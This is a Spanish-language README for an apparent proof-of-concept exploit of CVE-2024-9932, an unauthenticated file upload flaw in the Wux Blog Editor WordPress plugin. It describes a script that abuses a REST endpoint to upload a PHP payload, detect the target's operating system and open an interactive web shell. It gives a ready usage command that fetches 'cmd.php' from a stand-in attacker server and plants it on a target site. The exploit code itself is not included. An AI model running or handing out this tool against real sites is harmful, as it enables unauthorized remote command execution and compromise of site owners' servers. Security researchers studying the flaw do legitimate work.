
Exploit RCE 0-click no autenticado para CVE-2024-9932. Explota una vulnerabilidad de carga arbitraria de archivos en el plugin Wux Blog Editor de WordPress para subir un payload PHP remoto, detectar el sistema operativo objetivo y lograr la ejecución remota de comandos a través de una shell web interactiva.

Este repositorio contiene un exploit de prueba de concepto para CVE-2024-9932, una vulnerabilidad de subida arbitraria de archivos sin autenticación en el plugin Wux Blog Editor de WordPress, que permite la ejecución remota de comandos (RCE).
El script abusa de un endpoint REST vulnerable para subir un payload PHP remoto sin autenticación. Una vez subido, reconstruye la ubicación final del archivo, detecta el sistema operativo objetivo y proporciona un shell remoto interactivo para la ejecución de comandos.
python CVE-2024-9932.py --target http://target-wordpress-site --payload http://attacker-server/cmd.php --payload_name cmd.php
Tras la ejecución, el script sube el payload, confirma su accesibilidad, detecta el sistema operativo y abre un shell interactivo.